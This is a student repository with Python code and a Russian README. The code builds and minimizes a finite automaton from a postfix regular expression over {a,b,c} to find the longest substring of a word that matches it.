<groupId>org.jsonschema2pojo</groupId>\n <artifactId>jsonschema2pojo-maven-plugin</artifactId>\n <version>0.5.1</version>\n <executions>\n <execution>\n <goals>\n <goal>generate</goal>\n </goals>\n <configuration>\n <sourceDirectory>${project.basedir}/src/main/resources/schema/</sourceDirectory>\n <outputDirectory>${project.basedir}/src/main/java/</outputDirectory>\n <includeAdditionalProperties>false</includeAdditionalProperties>\n <includeHashcodeAndEquals>false</includeHashcodeAndEquals>\n <generateBuilders>true</generateBuilders>\n </configuration>\n </execution>\n </executions>\n </plugin>\n\n\n </plugins>\n </build>\n <name>neel-kafka-course</name>\n <description>Kafka beginners course</description>\n \n <repositories>\n\n\n\n <!-- further repository entries here -->\n\n</repositories>\n \n<dependencies>\n <!--Apache commons-->\n <dependency>\n <groupId>commons-lang</groupId>\n <artifactId>commons-lang</artifactId>\n <version>2.6</version>\n </dependency>\n\n <!-- https://mvnrepository.com/artifact/org.apache.kafka/kafka-clients -->\n\t<dependency>\n \t<groupId>org.apache.kafka</groupId>\n \t<artifactId>kafka-clients</artifactId>\n \t<version>2.6.0</version>\n\t</dependency>\n\n <dependency>\n 
<groupId>org.apache.kafka</groupId>\n <artifactId>kafka-streams</artifactId>\n <version>2.6.0</version>\n </dependency>\n\n <!-- further dependency entries here -->\n <!-- https://mvnrepository.com/artifact/org.slf4j/slf4j-simple -->\n\t<dependency>\n \t<groupId>org.slf4j</groupId>\n \t<artifactId>slf4j-simple</artifactId>\n \t<version>1.7.30</version>\n\t</dependency>\n\n <!--spark java framework for embedded -->\n <dependency>\n <groupId>com.sparkjava</groupId>\n <artifactId>spark-core</artifactId>\n <version>2.5</version>\n </dependency>\n <!-- javax.ws.rs -->\n <dependency>\n <groupId>javax.ws.rs</groupId>\n <artifactId>javax.ws.rs-api</artifactId>\n <version>2.1</version>\n </dependency>\n <!--Jeersey dependencies -->\n <dependency>\n <groupId>org.glassfish.jersey.containers</groupId>\n <artifactId>jersey-container-servlet</artifactId>\n <version>2.27</version>\n </dependency>\n\n</dependencies>\n \n</project>" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 17.5, "blob_id": "60d67b5a36d5d6ad64befc2c5ce0814c4cb63a5c", "content_id": "d1d205613cc9aa0f313e067f34bbb2428b424bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 36, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/App2/src/main/java/sport.properties", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "email=newemail@neel_sport.com\nteam=NeelBaseball_Team" }, { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.765625, "avg_line_length": 25.18181800842285, "blob_id": "726d939234940c9e6f09f3ae3ee5d3e3b765f5ce", "content_id": "26d055ed6a1d90a8766b4dffcd93761d7f85f3e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 576, "license_type": "no_license", "max_line_length": 104, "num_lines": 22, "path": "/App2/src/main/java/com/neel/SpringApp2.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel;\n\nimport org.springframework.context.support.ClassPathXmlApplicationContext;\n\npublic class SpringApp2 {\n\n\tpublic static void main(String[] args) {\n\t\t//load the application context file\n\t\tClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext(\"applicationContext.xml\");\n\t\t\n\t\t//get the bean\n\t\tCoach theCoach = context.getBean(\"myBaseballCoach\", Coach.class);\n\t\t//call the method\n\t\tSystem.out.println(theCoach.getDailyWorkout());\n\t\t\n\t\tSystem.out.println(theCoach.getAssistantCoachAdvise());\n\t\t\n\t\t//close the context\n\t\tcontext.close();\n\t}\n\n}\n" }, { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 11.142857551574707, "blob_id": "ad75cf2a0f303de264c3da76a52bc6e1b882fa86", "content_id": "3ce15036806fb71f6c2ddde19d5acaf9d5978706", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/TestPython/src/hello.py", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "'''\nCreated on 09-Aug-2020\n\n@author: neel\n'''\n\nprint(\"Hello Neel from Eclipse test\")" }, { "alpha_fraction": 0.8121739029884338, "alphanum_fraction": 0.8121739029884338, "avg_line_length": 29.263158798217773, "blob_id": "d79a683c1601e833e74d0cff6419db403e8a0ec8", "content_id": "beba8d38e09e4412911525c80af2cd1a8cc2bd25", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 575, "license_type": "no_license", "max_line_length": 63, "num_lines": 19, "path": "/firstApp/src/main/java/com/neel/springboot/WelcomeController.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel.springboot;\n\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.web.bind.annotation.RequestMapping;\nimport org.springframework.web.bind.annotation.RestController;\nimport com.neel.service.WelcomeServiceClass;\n\n@RestController\npublic class WelcomeController {\n\t//We inject the dependency created below by Auto Wiring\n\t@Autowired\n\t//private welcomeServiceClass msg = new welcomeServiceClass();\n\tprivate WelcomeServiceClass msg;\n\t\n\t@RequestMapping(\"/welcome\")\n\tpublic String welcome() {\n\t\treturn msg.WelcomeMessage();\n\t}\n}\n" }, { "alpha_fraction": 0.6477757692337036, "alphanum_fraction": 0.6477757692337036, "avg_line_length": 21.46575355529785, "blob_id": "a59d76a89091a70cc4ee6c0e9d050fe5c7d8e4a6", "content_id": "998969ae675cd7258bf238b88deaa7b777bd12b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1641, "license_type": "no_license", "max_line_length": 125, "num_lines": 73, "path": "/neel-kafka-course/src/main/java/com/neel/kafkacourse/types/Customers.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "\npackage com.neel.kafkacourse.types;\n\nimport com.fasterxml.jackson.annotation.JsonInclude;\nimport com.fasterxml.jackson.annotation.JsonProperty;\nimport com.fasterxml.jackson.annotation.JsonPropertyOrder;\nimport org.apache.commons.lang.builder.ToStringBuilder;\n\n@JsonInclude(JsonInclude.Include.NON_NULL)\n@JsonPropertyOrder({\n \"custID\",\n \"name\",\n \"address\"\n})\npublic class Customers {\n\n @JsonProperty(\"custID\")\n private String custID;\n @JsonProperty(\"name\")\n private String name;\n @JsonProperty(\"address\")\n private String address;\n\n @JsonProperty(\"custID\")\n public String getCustID() {\n return custID;\n }\n\n @JsonProperty(\"custID\")\n public void setCustID(String custID) {\n this.custID = custID;\n }\n\n public Customers withCustID(String custID) {\n this.custID = custID;\n return this;\n }\n\n @JsonProperty(\"name\")\n public String getName() {\n return name;\n }\n\n @JsonProperty(\"name\")\n public void setName(String name) {\n this.name = name;\n }\n\n public Customers withName(String name) {\n this.name = name;\n return this;\n }\n\n @JsonProperty(\"address\")\n public String getAddress() {\n return address;\n }\n\n @JsonProperty(\"address\")\n public void setAddress(String address) {\n this.address = address;\n }\n\n public Customers withAddress(String address) {\n this.address = address;\n return this;\n }\n\n @Override\n public String toString() {\n return new ToStringBuilder(this).append(\"custID\", custID).append(\"name\", name).append(\"address\", address).toString();\n }\n\n}\n" }, { "alpha_fraction": 0.6453320384025574, "alphanum_fraction": 0.6453320384025574, "avg_line_length": 21.824174880981445, "blob_id": "df77ac170d7e4bd6755504398cb5c9d2a71dc4ba", "content_id": "9ccf397525cbb62a9db8c52edc82845f98dee2d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2078, "license_type": "no_license", "max_line_length": 154, "num_lines": 91, "path": 
"/neel-kafka-course/src/main/java/com/neel/kafkacourse/types/Employees.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "\npackage com.neel.kafkacourse.types;\n\nimport com.fasterxml.jackson.annotation.JsonInclude;\nimport com.fasterxml.jackson.annotation.JsonProperty;\nimport com.fasterxml.jackson.annotation.JsonPropertyOrder;\nimport org.apache.commons.lang.builder.ToStringBuilder;\n\n@JsonInclude(JsonInclude.Include.NON_NULL)\n@JsonPropertyOrder({\n \"empid\",\n \"name\",\n \"department\",\n \"salary\"\n})\npublic class Employees {\n\n @JsonProperty(\"empid\")\n private String empid;\n @JsonProperty(\"name\")\n private String name;\n @JsonProperty(\"department\")\n private String department;\n @JsonProperty(\"salary\")\n private Integer salary;\n\n @JsonProperty(\"empid\")\n public String getEmpid() {\n return empid;\n }\n\n @JsonProperty(\"empid\")\n public void setEmpid(String empid) {\n this.empid = empid;\n }\n\n public Employees withEmpid(String empid) {\n this.empid = empid;\n return this;\n }\n\n @JsonProperty(\"name\")\n public String getName() {\n return name;\n }\n\n @JsonProperty(\"name\")\n public void setName(String name) {\n this.name = name;\n }\n\n public Employees withName(String name) {\n this.name = name;\n return this;\n }\n\n @JsonProperty(\"department\")\n public String getDepartment() {\n return department;\n }\n\n @JsonProperty(\"department\")\n public void setDepartment(String department) {\n this.department = department;\n }\n\n public Employees withDepartment(String department) {\n this.department = department;\n return this;\n }\n\n @JsonProperty(\"salary\")\n public Integer getSalary() {\n return salary;\n }\n\n @JsonProperty(\"salary\")\n public void setSalary(Integer salary) {\n this.salary = salary;\n }\n\n public Employees withSalary(Integer salary) {\n this.salary = salary;\n return this;\n }\n\n @Override\n public String toString() {\n return new ToStringBuilder(this).append(\"empid\", empid).append(\"name\", name).append(\"department\", department).append(\"salary\", salary).toString();\n }\n\n}\n" } ]
11
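StreamsApp1.java earlier in this repository's file list builds a count-by-key topology over "topic5" and looks the count for key "1" up in the "cnt" store. A quick way to exercise it is to publish a few keyed records first; the sketch below assumes the third-party kafka-python client and a broker reachable at localhost:9092, neither of which comes from the repository itself (the Java code points at neel-pc:9092).

```python
# Sketch: feed keyed records into "topic5" so the count-by-key topology in
# StreamsApp1 has something to aggregate. kafka-python and the broker address
# are assumptions, not part of the repository above.
from kafka import KafkaProducer

producer = KafkaProducer(bootstrap_servers="localhost:9092")

for value in (b"first", b"second", b"third"):
    producer.send("topic5", key=b"1", value=value)  # same key, so the count reaches 3

producer.flush()   # make sure everything reached the broker before exiting
producer.close()
```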
zhangfengknight/alien_invasion
https://github.com/zhangfengknight/alien_invasion
497f6c465e5612e06bcbf47e55e41f30cc0fa435
69f69325013541b653ccd23f2d47ac0f8af919a8
d1f4378ae3bae0f9652da66c2229738647f4e122
refs/heads/master
2020-12-06T22:00:23.438910
2020-01-08T13:26:12
2020-01-08T13:26:12
232,562,420
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7275822758674622, "alphanum_fraction": 0.7298524379730225, "avg_line_length": 27.419355392456055, "blob_id": "4090cfe1764b71191a4934f790c40cc8d2803376", "content_id": "b6de92bdf0e66a61f1da6819bce10a26a9b33a47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 961, "license_type": "no_license", "max_line_length": 68, "num_lines": 31, "path": "/alien_invasion/ship.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "GB18030", "text": "#coding:utf-8\nimport pygame\nclass Ship():\n\tdef __init__(self,all_settings,screen):\n\t\t\"\"\"set init positiong\"\"\"\n\t\tself.screen=screen\n\t\tself.all_settings=all_settings\n\t\t#加载飞船图像并获取其外接矩形\n\t\tself.image=pygame.image.load('images\\ship.bmp')\n\t\tself.rect=self.image.get_rect()\n\t\tself.screen_rect=screen.get_rect()\n\t\t\n\t\t#将每艘飞船放在屏幕底部中央\n\t\tself.rect.centerx=self.screen_rect.centerx\n\t\tself.rect.bottom=self.screen_rect.bottom\n\t\t\n\t\tself.center=float(self.rect.centerx)\n\t\t\n\t\tself.moving_right=False\n\t\tself.moving_left=False\n\t\t\n\tdef update(self):\n\t\tif self.moving_right and self.rect.right < self.screen_rect.right:\n\t\t\tself.center+=self.all_settings.ship_speed_factor\n\t\tif self.moving_left and self.rect.left > 0:\n\t\t\tself.center-=self.all_settings.ship_speed_factor#注意此处是减号 因为是在x轴上\n\t\t\n\t\tself.rect.centerx=self.center\n\tdef blitme(self):\n\t\t\"\"\"draw position\"\"\"\n\t\tself.screen.blit(self.image,self.rect)\n" }, { "alpha_fraction": 0.7165604829788208, "alphanum_fraction": 0.7213375568389893, "avg_line_length": 21.428571701049805, "blob_id": "77681484769e0e651239a58eb4cc6e27efa18498", "content_id": "6ff81972f7f1c4967df0be53cd25b7f23ea66db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "no_license", "max_line_length": 54, "num_lines": 28, "path": "/alien_invasion/bullet.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "UTF-8", "text": "#coding:utf-8\n\nimport pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n\tdef __init__(self,all_settings,screen,ship):\n\t\tsuper().__init__()\n\t\tself.screen=screen\n\t\n\t\tself.rect=pygame.Rect(0,0,all_settings.bullet_width,\n\t\t\tall_settings.bullet_height)\n\t\tself.rect.centerx=ship.rect.centerx\n\t\tself.rect.top=ship.rect.top\n\t\n\t\tself.y=float(self.rect.y)\n\t\t\n\t\tself.color=all_settings.bullet_color\n\t\tself.speed_factor=all_settings.bullet_speed_factor\n\t\t\n\t\t#self.space=False\n\tdef update(self):\n\t\t\n\t\tself.y-=self.speed_factor\n\t\tself.rect.y=self.y\n\t\t\n\tdef draw_bullet(self):\n\t\tpygame.draw.rect(self.screen,self.color,self.rect)\n" }, { "alpha_fraction": 0.7154626250267029, "alphanum_fraction": 0.7167300581932068, "avg_line_length": 29.34000015258789, "blob_id": "339f138705c5dfb3980c1b0337980983d03c6f77", "content_id": "822896d93cd2566101b651f80c07e407a86d6eeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1672, "license_type": "no_license", "max_line_length": 68, "num_lines": 50, "path": "/alien_invasion/game_functions.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "GB18030", "text": "#coding:utf-8\n\nimport sys\nimport pygame\nfrom bullet import Bullet\n\ndef check_events(all_settings,screen,ship,bullets):\n\t\"\"\"Corresponding buttons and mouse\"\"\"\n\tfor event in pygame.event.get():\n\t\tif 
event.type==pygame.QUIT:\n\t\t\tsys.exit()\n\t\t\t\n\t\telif event.type==pygame.KEYDOWN:#按下键时\n\t\t\tcheck_keydown_events(event,all_settings,screen,ship,bullets)\n\t\t\tcheck_keydown_events(event,all_settings,screen,ship,bullets)\n\t\telif event.type==pygame.KEYUP:#松开键时\n\t\t\tcheck_keyup_events(event,ship)\n\t\t\t#check_keydown_events(event,all_settings,screen,ship,bullets)\ndef update_screen(all_settings,screen,ship,bullets):\n\t\"\"\"update screen turn new screen\"\"\"\n\t#每次循环时都重绘屏幕\n\tscreen.fill(all_settings.bg_color)#填充屏幕 只接受一个参数\n\tship.blitme()#绘制飞船\n\tfor bullet in bullets.sprites():\n\t\tbullet.draw_bullet()\n\t#让最近绘制的屏幕可见\n\tpygame.display.flip()\ndef check_keydown_events(event,all_settings,screen,ship,bullets):#按键\n\tif event.key==pygame.K_RIGHT:\n\t\tship.moving_right=True\n\telif event.key==pygame.K_LEFT:\n\t\tship.moving_left=True\n\telif event.key==pygame.K_SPACE:\n\t\t#bullets.space=True\n\t\tif len(bullets) < all_settings.bullets_allowed:\n\t\t\tnew_bullet=Bullet(all_settings,screen,ship)\n\t\t\tbullets.add(new_bullet)\ndef check_keyup_events(event,ship):#松键\n\tif event.key==pygame.K_RIGHT:\n\t\tship.moving_right=False\n\telif event.key==pygame.K_LEFT:\n\t\tship.moving_left=False\n\t#elif event.key==pygame.K_SPACE:\n\t\t#bullets.space=False\t\n\ndef update_bullets(bullets):\t\n\tbullets.update()\n\tfor bullet in bullets.copy():\n\t\tif bullet.rect.bottom <= 0:\n\t\t\tbullets.remove(bullet)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\t\n" }, { "alpha_fraction": 0.7516340017318726, "alphanum_fraction": 0.7529411911964417, "avg_line_length": 20.85714340209961, "blob_id": "d5ed727676e5341ee72f894184265e88688596d0", "content_id": "2855f5e397240e5380aec75f201ba0d378c82e8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 847, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/alien_invasion/alien_invasion.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "GB18030", "text": "#coding:utf-8\n\nimport pygame\nfrom ship import Ship\nfrom settings import Settings\nimport game_functions as gf\nfrom pygame.sprite import Group\n#from bullet import Bullet\ndef run_game(): \n\tpygame.init()\n\tall_settings=Settings()\n\tscreen=pygame.display.set_mode(\n\t\t(all_settings.screen_width,all_settings.screen_height))\n\tpygame.display.set_caption(\"Alien Invasion\")\n\t\n\t#创建一艘飞船\n\tship=Ship(all_settings,screen)\n\t#创建一个用于储存子弹的编组\n\tbullets=Group()\n\t\n\t#开始游戏的主循环\n\twhile True:\n\t\t\n\t\t#监听键鼠事件\n\t\tgf.check_events(all_settings,screen,ship,bullets)\n\t\tgf.check_events(all_settings,screen,ship,bullets)\n\t\tship.update()\n\t\tgf.update_bullets(bullets)\n\t\t\n\t\t\n\t\tgf.update_screen(all_settings,screen,ship,bullets)\n\t\t#重新加载飞船图像\n\t\tgf.update_screen(all_settings,screen,ship,bullets)\t\n\t\t\nrun_game()\n" }, { "alpha_fraction": 0.6179401874542236, "alphanum_fraction": 0.7109634280204773, "avg_line_length": 24.08333396911621, "blob_id": "4366f7953aca58f206991ccce50d5288c388012c", "content_id": "666ce2db0e9906ab5eb7f8858d74fcbe714a5956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 29, "num_lines": 12, "path": "/alien_invasion/settings.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "UTF-8", "text": "class Settings():\n\t\"\"\"store all settings\"\"\"\n\tdef 
__init__(self):\n\t\tself.screen_width=1200\n\t\tself.screen_height=800\n\t\tself.bg_color=(230,230,230)\n\t\tself.ship_speed_factor=1\n\t\tself.bullet_speed_factor=1\n\t\tself.bullet_width=3\n\t\tself.bullet_height=15\n\t\tself.bullet_color=60,60,60\n\t\tself.bullets_allowed=3\n" } ]
5
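In the alien_invasion listing above, check_events fires check_keydown_events twice for every key press and run_game repeats the gf.check_events and gf.update_screen calls, so each frame does its work twice. The sketch below shows the main entry point with the duplicates removed; it assumes the same sibling modules (settings, ship, game_functions) and image assets that the repository already provides, and the same de-duplication applies inside game_functions.check_events.

```python
# Sketch: alien_invasion.py entry point with the duplicated calls removed.
# Relies on the repository's own settings.py, ship.py, game_functions.py
# and the images/ship.bmp asset.
import pygame
from pygame.sprite import Group

from settings import Settings
from ship import Ship
import game_functions as gf


def run_game():
    pygame.init()
    all_settings = Settings()
    screen = pygame.display.set_mode(
        (all_settings.screen_width, all_settings.screen_height))
    pygame.display.set_caption("Alien Invasion")

    ship = Ship(all_settings, screen)   # the player's ship
    bullets = Group()                   # live bullets

    while True:
        gf.check_events(all_settings, screen, ship, bullets)   # poll input once
        ship.update()                                          # move the ship
        gf.update_bullets(bullets)                             # advance and prune bullets
        gf.update_screen(all_settings, screen, ship, bullets)  # redraw once per frame


if __name__ == "__main__":
    run_game()
```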
orusovten/orusovten-mipt-flat-2020-practice1
https://github.com/orusovten/orusovten-mipt-flat-2020-practice1
13e42b7e39b2d730b27f222b74e90e352d6221cb
6f055b164f38693d4768462c2b789e963b791444
363e1df9dc2589910e64e90a523f19679b8e1a28
refs/heads/master
2023-02-13T23:38:06.760670
2021-01-11T13:26:01
2021-01-11T13:26:01
311,153,490
6
0
null
2020-11-08T20:57:35
2021-01-11T13:25:49
2021-01-11T13:26:02
null
[ { "alpha_fraction": 0.551353394985199, "alphanum_fraction": 0.5530509948730469, "avg_line_length": 39.46946716308594, "blob_id": "a7087ca2c44d2b24a2b28261bebce23a11e64c54", "content_id": "29f34bf94c04dda2650b72d829098bf4aed29b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10603, "license_type": "no_license", "max_line_length": 119, "num_lines": 262, "path": "/RegularExpressionAutomaton.py", "repo_name": "orusovten/orusovten-mipt-flat-2020-practice1", "src_encoding": "UTF-8", "text": "from collections import deque\nfrom queue import Queue\n\n\nclass MyDFA:\n def __init__(self):\n self.states = set()\n self.input_symbols = set()\n self.transitions = dict()\n self.initial_state = ''\n self.final_states = set()\n\n def minify(self):\n symbol_classes = dict()\n for state in self.states - self.final_states:\n symbol_classes.update({state: 0})\n for state in self.final_states:\n symbol_classes.update({state: 1})\n equiv_classes = [self.states - self.final_states, self.states]\n alphabet_list = list(self.input_symbols)\n is_end = False\n while not is_end:\n clazzes_dict = dict()\n for state in self.states:\n clazz = (symbol_classes[state],\n *[symbol_classes[self.transitions[state][symbol]] for symbol in alphabet_list])\n if clazzes_dict.get(clazz) is None:\n clazzes_dict.update({clazz: {state}})\n else:\n clazzes_dict[clazz].add(state)\n new_equiv_classes = [set() for i in range(len(clazzes_dict.keys()))]\n new_symbol_classes = dict()\n for i, states in enumerate(clazzes_dict.values()):\n for state in states:\n new_symbol_classes.update({state: i})\n new_equiv_classes[i] = states\n if len(new_equiv_classes) == len(equiv_classes):\n is_end = True\n equiv_classes = new_equiv_classes\n symbol_classes = new_symbol_classes\n min_dfa = MyDFA()\n min_dfa.input_symbols = self.input_symbols\n for i in range(len(equiv_classes)):\n min_dfa.states.add(i)\n delegate = equiv_classes[i].pop()\n equiv_classes[i].add(delegate)\n for symbol in self.input_symbols:\n if min_dfa.transitions.get(i) is None:\n min_dfa.transitions.update({i:\n {symbol: symbol_classes[self.transitions[delegate][symbol]]}})\n else:\n min_dfa.transitions[i].update({symbol:\n symbol_classes[self.transitions[delegate][symbol]]})\n if delegate in self.final_states:\n min_dfa.final_states.add(i)\n min_dfa.initial_state = symbol_classes[self.initial_state]\n return min_dfa\n\n\nclass MyNFA:\n def __init__(self):\n self.states = set()\n self.input_symbols = set()\n self.transitions = dict()\n self.initial_state = 0\n self.final_states = set()\n\n def bfs(self, start_state, symbol) -> (set, bool):\n queue = Queue()\n queue.put(start_state)\n states = set()\n visited = set()\n is_final = False\n while not queue.empty():\n state = queue.get()\n if state in self.final_states:\n is_final = True\n visited.add(state)\n if self.transitions[state].get(symbol) is not None:\n for neighbour_state in self.transitions[state][symbol]:\n states.add(neighbour_state)\n if self.transitions[state].get('') is not None:\n for neighbour_state in self.transitions[state]['']:\n if neighbour_state not in visited:\n visited.add(neighbour_state)\n queue.put(neighbour_state)\n return states, is_final\n\n def deleting_empty_transitions(self):\n new_nfa = MyNFA()\n new_nfa.input_symbols = self.input_symbols - {''}\n new_nfa.initial_state = self.initial_state\n good_states = {self.initial_state}\n while len(good_states) > 0:\n state = good_states.pop()\n new_nfa.transitions.update({state: dict()})\n 
new_nfa.states.add(state)\n for symbol in new_nfa.input_symbols:\n states, is_final = self.bfs(state, symbol)\n new_nfa.transitions[state].update({symbol: states})\n good_states |= states - new_nfa.states\n if is_final:\n new_nfa.final_states.add(state)\n return new_nfa\n\n @staticmethod\n def get_from_set_fields_to_int_fields(states_sets, final_states_sets, set_transitions, alphabet,\n initial_state) -> MyDFA:\n my_dfa = MyDFA()\n states_sets_dict = {states_set: i for i, states_set in enumerate(states_sets)}\n my_dfa.initial_state = states_sets_dict.get(frozenset([initial_state]))\n my_dfa.states = set(states_sets_dict.values())\n for set_state in final_states_sets:\n my_dfa.final_states.add(states_sets_dict[set_state])\n my_dfa.transitions = {i: {symbol: states_sets_dict[set_transitions[states_set][symbol]] for symbol in alphabet}\n for states_set, i in states_sets_dict.items()}\n my_dfa.input_symbols = alphabet\n return my_dfa\n\n def determinization(self) -> MyDFA:\n states_sets = {frozenset([self.initial_state])}\n final_states_sets = set()\n set_transitions = dict()\n queue = Queue()\n queue.put(frozenset([self.initial_state]))\n while not queue.empty():\n vertices_set = queue.get()\n set_transitions.update({vertices_set: dict()})\n for symbol in self.input_symbols:\n new_vertices_set = set()\n is_terminal = False\n for vertex in vertices_set:\n if symbol in self.transitions[vertex]:\n for neighbour_vertex in self.transitions[vertex][symbol]:\n if neighbour_vertex not in new_vertices_set:\n new_vertices_set.add(neighbour_vertex)\n if neighbour_vertex in self.final_states:\n is_terminal = True\n new_vertices_set = frozenset(new_vertices_set)\n set_transitions[vertices_set].update({symbol: new_vertices_set})\n if new_vertices_set not in states_sets:\n states_sets.add(new_vertices_set)\n queue.put(new_vertices_set)\n if is_terminal:\n final_states_sets.add(new_vertices_set)\n return MyNFA.get_from_set_fields_to_int_fields(states_sets, final_states_sets, set_transitions,\n self.input_symbols, self.initial_state)\n\n number_of_state = 0\n\n def init_by_symbol(self, symbol):\n if symbol == '1':\n self.initial_state = MyNFA.number_of_state\n MyNFA.number_of_state += 1\n self.transitions = {self.initial_state: {}}\n self.final_states = {self.initial_state}\n self.states = self.final_states\n else:\n new_vertex = MyNFA.number_of_state\n self.initial_state = new_vertex\n MyNFA.number_of_state += 1\n new_vertex = MyNFA.number_of_state\n self.final_states = {new_vertex}\n self.transitions = {self.initial_state: {symbol: {new_vertex}}, new_vertex: {}}\n self.states = {self.initial_state} | self.final_states\n MyNFA.number_of_state += 1\n return self\n\n\ndef sum(left, right) -> MyNFA: # operator +\n if left.transitions[left.initial_state].get('') is None:\n left.transitions[left.initial_state].update({'': {right.initial_state}})\n else:\n left.transitions[left.initial_state][''].add(right.initial_state)\n left.transitions.update(right.transitions)\n if left.initial_state in left.final_states:\n left.final_states.pop(left.initial_state)\n left.final_states |= right.final_states\n left.states |= right.states\n return left\n\n\ndef concatenate(left, right) -> MyNFA: # operator .\n for final_state in left.final_states:\n if left.transitions[final_state].get('') is None:\n left.transitions[final_state].update({'': {right.initial_state}})\n else:\n left.transitions[final_state][''].add(right.initial_state)\n left.transitions.update(right.transitions)\n left.states.update(right.states)\n 
left.final_states = right.final_states\n return left\n\n\ndef star(automaton) -> MyNFA: # operator *\n for final_state in automaton.final_states:\n automaton.transitions.update({final_state: {'': {automaton.initial_state}}})\n automaton.final_states.add(automaton.initial_state)\n return automaton\n\n\ndef build_automaton(expression, expression_alphabet) -> MyNFA:\n stack = deque()\n for symbol in expression:\n if symbol in expression_alphabet:\n automaton = MyNFA()\n stack.append(automaton.init_by_symbol(symbol))\n elif symbol == \"*\":\n if len(stack) == 0:\n print(\"ERROR\")\n break\n stack.append(star(stack.pop()))\n elif symbol == \"+\":\n if len(stack) < 2:\n print(\"ERROR\")\n break\n right = stack.pop()\n left = stack.pop()\n stack.append(sum(left, right))\n elif symbol == \".\":\n if len(stack) < 2:\n print(\"ERROR\")\n break\n right = stack.pop()\n left = stack.pop()\n stack.append(concatenate(left, right))\n else:\n print(\"ERROR\")\n break\n if len(stack) != 1:\n print(\"ERROR\")\n else:\n nfa = stack.pop()\n nfa.input_symbols = expression_alphabet - {'1'} | {''}\n return nfa\n\n\ndef count_length_of_the_longest_substring_matching(expression, word) -> int:\n expression_alphabet = {'a', 'b', 'c', '1'}\n my_nfa = build_automaton(expression, expression_alphabet)\n nfa_without_empty_transitions = my_nfa.deleting_empty_transitions()\n dfa = nfa_without_empty_transitions.determinization()\n min_dfa = dfa.minify()\n ans = 0\n for i in range(len(word)):\n pre_ans = 0\n state = min_dfa.initial_state\n for j in range(i, len(word)):\n if word[j] not in min_dfa.input_symbols:\n break\n state = min_dfa.transitions[state][word[j]]\n if state in min_dfa.final_states:\n pre_ans = j - i + 1\n if pre_ans > ans:\n ans = pre_ans\n return ans\n\n\nif __name__ == '__main__':\n expression = input()\n word = input()\n print(count_length_of_the_longest_substring_matching(expression, word))\n" }, { "alpha_fraction": 0.6574627161026001, "alphanum_fraction": 0.6716417670249939, "avg_line_length": 59.90909194946289, "blob_id": "da99a8b82b914102799c1ba1c2553d649c7baf38", "content_id": "7940d81167d8d3fd5aee4a36d17f54f689513a39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2122, "license_type": "no_license", "max_line_length": 128, "num_lines": 22, "path": "/README.md", "repo_name": "orusovten/orusovten-mipt-flat-2020-practice1", "src_encoding": "UTF-8", "text": "# orusovten-mipt-flat-2020-practice1\n***Задача*** \nДаны регулярное выражение α и слово u из {a,b,c}*. \nНайти длину самого длинного подслова u в L(α).\n***\n***Идея алгоритма*** \n**Шаг 1** Строим НКА(с возможно epsilon-переходами) по регулярному выражению \n**Шаг 2** Удаляем epsilon-переходы \n**Шаг 3** Переводим НКА в ПДКА \n**Шаг 4** Переводим ПДКА в минимальный ПДКА \n**Шаг 5** \"Запускаемся\" из стартового состояния по последовательным буквам слева направо, начиная с i-ой, i = 0, 1, ..., |u|. \nНа каждой подытерации проверяем, не пришли ли в завершающее состояние, если да, то стараемся обновить ответ.\n***\n***Оценка асимптотики*** \n**Шаг 1** O(|α| * q), где q - число состояний в НКА, в худшем случае для асимптотики все cостояния - завершающие \n**Шаг 2** O(E * q), по каждому символу и по каждому состоянию делаем линейные запуски по eplison-ребрам + ребро-символ. \n**Шаг 3** O((Q * q * E), где Q и q - числа состояний в ПДКА и НКА соответственно, E - число ребер в исходном, \nчисло итераций равно Q, каждая из них занимает O(q * E), т.к. состояния ПДКА есть \"мультисостояния НКА\". 
